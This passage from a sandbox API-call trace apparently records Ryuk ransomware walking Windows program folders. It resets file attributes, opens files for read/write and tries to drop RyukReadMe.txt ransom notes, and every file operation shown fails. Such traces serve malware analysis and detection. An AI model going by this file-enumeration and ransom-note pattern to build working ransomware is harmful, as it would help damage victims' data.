0xffffffffffffffff [0133.502] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.502] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.502] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.502] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.502] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.503] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.503] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.503] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.503] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", dwFileAttributes=0x80) returned 0 [0133.503] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.503] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.504] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.504] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.504] SetLastError (dwErrCode=0x0) [0133.504] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.507] GetLastError () returned 0x5 [0133.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.507] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.507] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.507] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.508] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.508] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.508] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.508] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.508] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.508] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.509] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.509] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.509] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.509] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.509] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.509] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", dwFileAttributes=0x80) returned 0 [0133.509] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.510] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.510] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.510] SetLastError (dwErrCode=0x0) [0133.510] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.510] GetLastError () returned 0x5 [0133.510] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.510] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.512] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.512] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.512] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.512] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.512] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.513] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.513] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.513] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.514] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.514] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", dwFileAttributes=0x80) returned 0 [0133.514] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.514] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.514] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", dwFileAttributes=0x80) returned 0 [0133.515] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.515] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.515] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.515] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.515] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.516] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.516] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.516] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.516] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.516] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.516] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.516] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.517] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.517] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.517] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.517] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.517] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.517] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.517] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.518] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.518] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.518] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.518] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.518] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.518] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", dwFileAttributes=0x80) returned 0 [0133.518] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.519] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.519] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.519] SetLastError (dwErrCode=0x0) [0133.519] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.522] GetLastError () returned 0x5 [0133.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.522] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.522] SetLastError (dwErrCode=0x0) [0133.522] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.522] GetLastError () returned 0x5 [0133.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.522] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.524] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.524] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.524] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.525] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.525] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.525] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0133.526] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.526] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.526] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", dwFileAttributes=0x80) returned 0 [0133.526] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.527] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.527] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", dwFileAttributes=0x80) returned 0 [0133.527] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.527] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.527] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.528] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.528] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.528] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.528] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.529] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.529] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.529] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.529] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.529] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.530] CreateFileW (lpFileName="C:\\Program Files\\DVD 